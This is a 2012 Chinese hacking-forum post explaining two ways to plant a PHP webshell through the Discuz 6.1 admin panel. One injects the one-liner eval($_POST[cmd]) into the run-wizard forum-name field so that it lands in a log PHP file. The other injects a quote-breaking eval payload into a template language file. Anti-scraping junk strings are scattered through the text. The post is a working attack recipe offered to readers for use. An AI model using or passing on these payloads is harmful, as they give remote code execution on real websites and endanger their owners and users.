中国网络渗透测试联盟
标题:
discuz6.1后台拿shell方法
[打印本页]
作者:
admin
时间:
2012-9-13 16:59
标题:
discuz6.1后台拿shell方法
discuz6.1两种方法后台拿shell
/ C: `0 u, u1 I$ q$ J
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
' G4 c# [. u: ]& D
1:
3 }$ Y9 U& J, @# g* d
http://127.0.0.1/discuz/admincp. ... zard&frames=yes
1 V; v8 l- t( g7 U) V! o; U
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
2 H0 `% m/ s8 J% ]& n
<?php eval($_POST[cmd]);?>
2 x& h! ?$ O5 _
后台webshell地址:
http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
% n) Q/ T% a2 M7 |/ j
( j% M, W. j8 o/ S3 v
# C7 M( l- ^) i' b2 l
2:后台模板管理--默认模板套系--详情
" _) `6 }/ q; _
templates/default/actions.lang.php
: @; c# W9 D0 s& t) }$ D0 z
jhackj\\');eval($_POST[cmd])?>;//
" }4 n7 Y2 B! J* J3 a6 n' D
, T( o) {: c/ M: A, A/ N, V& ]3 V
利用很简单,聪明的人一看就懂了
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2